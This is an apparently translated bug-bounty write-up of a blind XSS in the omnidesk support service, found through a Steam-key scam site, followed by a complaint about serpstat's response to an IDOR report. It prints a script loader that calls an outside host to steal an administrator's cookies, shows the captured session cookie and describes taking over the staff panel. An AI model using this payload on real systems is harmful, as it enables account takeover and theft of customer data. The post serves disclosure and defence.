Background: This story begins with the fact that in many public pages I am subscribed to, I saw seeding (paid advertising in social networks) of groups offering free Steam keys, vk.com/******* and vk.com/*** **. These expensive ads ran in groups with 250,000 to 5,000,000 subscribers, for example in the Science and Technology group. The groups offered everyone a free key in exchange for subscribing. After about half a month I saw that the first group had grown to 109,000 subscribers. Anyone can see that nobody is going to get a free key, because nobody gives away free keys to 100,000 people. After a little inspection of the group, I realized that the "real" feedback about receiving free keys is fake: the same review screenshots are posted over and over, and the links to the people are fake.
The most interesting thing is that people keep doing this all the time: they join the group in the hope of a free key and repost in the hope of being lucky and winning an expensive gaming PC (though we know that nobody will get a PC). When people want something for free, they are easy to manipulate for someone else's purposes.
All the posts in the group boil down to advertising a referral link to the site http://kfgrandom.ru/ and profiting from it.
Let's take a look at it.
The site claims to have existed for more than three years, although the domain kfgrandom.ru was registered on 2016.10.07.
Click on "I want to earn" and we see the message:
Do you have a group and want to earn money on it? Get a link and drive the traffic, receiving 75% from each key sold. We consider publics from 5,000 subscribers.
Mathematics: For example, if 10% of 100,000 subscribers buy a key for 100 rubles, the publisher receives 10,000 * 100 = 1,000,000 – 250,000 (25%) = 750,000 rubles ($12 500). A good income; presumably they will pay well for a vulnerability found in their service.
The sites http://imba-keys.ru/ and https://kfgrandom.ru share the same support service. We test the support service at http://support.gamedelivery.info/. I look at the personal cabinet, but no vulnerabilities are found there, nor in the ticket search. The only hope left is to send a request to the support service.
We test for a blind XSS vulnerability: we send the admin a ticket with the payload in the name and body fields:
We sent the admin JS with our sniffer and a redirect to our site. We look at the logs:
**3.9*.56.123 - - [18/Feb/2017:01:14:10 +0300] "GET /gamedelivery HTTP/1.1" 200 391686 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.2 Safari/537.36"
No requests reached the sniffer; only the redirect script was executed, so the support system has a filter on the
We try to load our sniffer script another way: via onerror in an img tag:
var script = document.createElement('script');
script.src = '//securityz.net/test_for_habr.js';
document.body.appendChild(script);
We wait for the administrator to open the ticket with the JS, which will send us all his cookies, a screenshot of the page and the full HTML code of the page.
The script was executed on /staff/cases/list/filter/open, and the cookies came to me.
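The filter described above stopped a bare script tag but not an img/onerror handler, which is the typical failure of tag blocklists. The following added example (my code, not the author's or omnidesk's; the real filter is not shown in the article, so the blocklist here is an assumed stand-in) contrasts such a blocklist with contextual HTML escaping of ticket fields as the staff panel would render them, over constructed sample tickets:

```python
import html
import re

# Constructed sample tickets modelled on the two vectors in the article:
# a <script> tag (caught by the filter) and an <img> with onerror (not caught).
SAMPLE_TICKETS = [
    {"name": "Key not received", "body": "Paid for a key, nothing came."},
    {"name": "<script>alert(1)</script>", "body": "hello"},
    {"name": "x", "body": '<img src=x onerror="alert(1)">'},
]

SCRIPT_TAG = re.compile(r"<\s*/?\s*script[^>]*>", re.IGNORECASE)


def blocklist_filter(value: str) -> str:
    """Assumed stand-in for the support system's filter: strips <script> tags
    only, so any other tag carrying an event handler passes through untouched."""
    return SCRIPT_TAG.sub("", value)


def contextual_escape(value: str) -> str:
    """Encode for an HTML text context: '<', '>', '&' and both quote characters
    become entities, so no tag or attribute can form whatever the payload is."""
    return html.escape(value, quote=True)


def render_staff_row(ticket: dict, sanitize) -> str:
    """Render one row of the staff ticket list with the given sanitizer."""
    return "<tr><td>{}</td><td>{}</td></tr>".format(
        sanitize(ticket["name"]), sanitize(ticket["body"]))


def contains_active_markup(rendered: str) -> bool:
    """Check used only to compare the two approaches: does the rendered HTML
    still contain a script element or a tag with an on* event handler?"""
    return bool(re.search(r"<\s*script|<[^>]+\son\w+\s*=", rendered, re.IGNORECASE))


def audit(sanitize) -> list:
    """Return the indexes of sample tickets that still render active markup."""
    return [i for i, t in enumerate(SAMPLE_TICKETS)
            if contains_active_markup(render_staff_row(t, sanitize))]


if __name__ == "__main__":
    print("blocklist leaves active markup in tickets:", audit(blocklist_filter))
    print("escaping leaves active markup in tickets:", audit(contextual_escape))
```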
PHPSESSID=4182ssjqfae0fl73f7lqkgdcb8; ajs_anonymous_id=%22c8582a35-f81b-43bd-8223-e0c7c43bc53a%22; _hjIncludedInSample=1; _cioid=client-2990; _cio=54bdeef1-058c-8f11-47fe-26d4f538fcf7; ajs_user_id=null; ajs_group_id=null
And a screenshot:
I did not put much hope in the cookies, because I often run into HttpOnly, and here it could have been the same.
I substitute the cookies and find myself in the employee panel.
I try to change the password on this account, but the current password is required for that. I cannot add a new employee, because this account does not have enough rights.
We can view all tickets (there are only about 10 thousand) and all users. Many users are unhappy with the service in their tickets: the wrong key came, the key was already used, the key never arrived, a game they did not want (well, here the user himself is to blame, it says it is a random game). We can also download all the data with one click.
There are only 18 thousand users, and we can download the following information about them: username, email, links to their social networks (Facebook, VK, Google+, Skype, Viber). We can also edit information about any user, manage any ticket, write to arbitrary email addresses on behalf of email@example.com (sending phishing emails or a link to a competitor's site to every address in the database) and edit any article in the knowledge base. And not just edit it: you can also insert arbitrary JS, and it will execute for any user.
After I discovered the vulnerability, I immediately reported it via the feedback form. While waiting for an answer, my friend told me that this support service is a project of omnidesk.ru. They provide such a support service to many companies. This means that, using blind XSS this way, it would be possible to hack all omnidesk clients. The list of clients is not publicly available.
But if an attacker were in my place, he would have compromised an employee of support.omnidesk.ru, dumped the list of all companies, and attacked them.
We use the Google dork site:*.omnidesk.ru and find 2050 companies! That is quite a lot. But that is not all of them; there are actually more, because not all companies use the canonical name *.omnidesk.ru. Gamedelivery.omnidesk.ru, for example, is not present in search engines and does not show up anywhere. The only option would be to look at the IP subnet. If this vulnerability had fallen into the hands of criminals, there would have been a huge data leak. Sites with the largest Alexa rank (in Russia):
There is a demo period for using the service (14 days), after which you have to pay. So omnidesk also earns good money.
A response came from kfgrandom.ru that the vulnerability and the leak of their databases are not their problem but omnidesk's. We write to omnidesk. The manager first offers 1000 rubles ($16) for information about this XSS.
We reply that this vulnerability is critical and ask to slightly increase the compensation.
I can offer 3000 rubles.
We cannot pay much for something like this. First, we are not as rich as you think. Secondly, you first reported the vulnerability to the client, and only then to us. Thirdly, you already have customer data. That is, everything we would have liked to avoid has already happened. The vulnerability itself has been fixed.
February 15 at 14:24: the logs came.
February 15 at 15:33: I write to the owner of the support service.
February 16 at 1:13: the reward of 3000 rubles ($50).
February 17: I help the developers with security.
February 20: the developers eliminate the remaining vulnerabilities.
XSS on omnidesk, video:
The omnidesk site is very good; it is a pity that they cared so little about their security. Now, I think, they have realized that security must come first in the project. I really hope this article will not affect their reputation in any way.
When you point out a "hole" in their security, many companies understand that it needs to be closed; others simply do not care about the security of their site and think "It works, let it work, we will not touch it." Example: the CEO of a company from Odessa (Ukraine), serpstat.com (Alexa rank 10,000 in Russia). The only way to contact the developers is to write to the chat. Here is the chat transcript:
Me: I found an XSS vulnerability, where can I send information about it?
Evgeny: A vulnerability in our service?
Me: Yes, in yours.
Evgeny: We are invulnerable, like the protagonist in Die Hard 3.
Me: I also found an IDOR, I can delete any project on the site, give me a number.
Evgeny: No problem, 85987.
(The operator then pretended that I had not deleted his project :D, although I was able to delete the project on a second test account.)
Me: I also found an XSS vulnerability on your site https://www.openbugbounty.org/incidents/213614/.
Me: Do you need it, should I send the details?
Evgeny: Thank you, keep it to yourself.
Me: It feels like you do not care about the security of the website.
Evgeny: I would rather not follow any links that you write in the chat.
(Most likely, the link to openbugbounty scared the operator.)
Screenshot of the correspondence:
By the way, you can make a nice meme out of this :D
The conclusion of this article: in the administrative panel, cookies must be set with HttpOnly. serpstat.com does not care about its security; it is better not to trust this company with your data.
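The session cookie stolen above (PHPSESSID) would not have been readable from document.cookie had it carried HttpOnly. As an added example, not part of the original article, here is a small audit of Set-Cookie headers against the attributes an admin-panel session cookie should carry (HttpOnly, Secure, SameSite); the headers and the session-id placeholder are constructed:

```python
# Attributes an administrative session cookie should carry, in report order.
REQUIRED_ATTRIBUTES = ("httponly", "secure", "samesite")

# Constructed headers: a PHP-style session cookie without hardening, and the same
# cookie hardened. The session id is a placeholder, not a real value.
WEAK = "PHPSESSID=<session-id-placeholder>; Path=/"
HARDENED = "PHPSESSID=<session-id-placeholder>; Path=/; Secure; HttpOnly; SameSite=Lax"


def parse_set_cookie(header: str) -> dict:
    """Parse one Set-Cookie header into name, value and a dict of attributes.
    Attribute names are lower-cased; valueless flags (Secure, HttpOnly) map to True."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, has_eq, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if has_eq else True
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def audit_set_cookie(header: str) -> list:
    """Return the hardening attributes missing from a Set-Cookie header."""
    attrs = parse_set_cookie(header)["attrs"]
    missing = [a for a in REQUIRED_ATTRIBUTES if a not in attrs]
    # SameSite=None gives no cross-site protection on its own; report it as missing.
    if str(attrs.get("samesite", "")).lower() == "none":
        missing.append("samesite")
    return missing


def readable_by_script(header: str) -> bool:
    """True if page script could read this cookie via document.cookie,
    i.e. the HttpOnly flag is absent."""
    return "httponly" not in parse_set_cookie(header)["attrs"]


if __name__ == "__main__":
    for label, header in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, "missing:", audit_set_cookie(header),
              "readable by script:", readable_by_script(header))
```

HttpOnly only stops the cookie from being exfiltrated; the injected script still runs inside the administrator's session and could act on tickets and users from there, so escaping ticket fields on output remains the root fix.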
Previous article: [BugBounty] Partial authentication bypass vk.com.
P.S.: Please subscribe to my vk and twitter, I will post information about new articles there.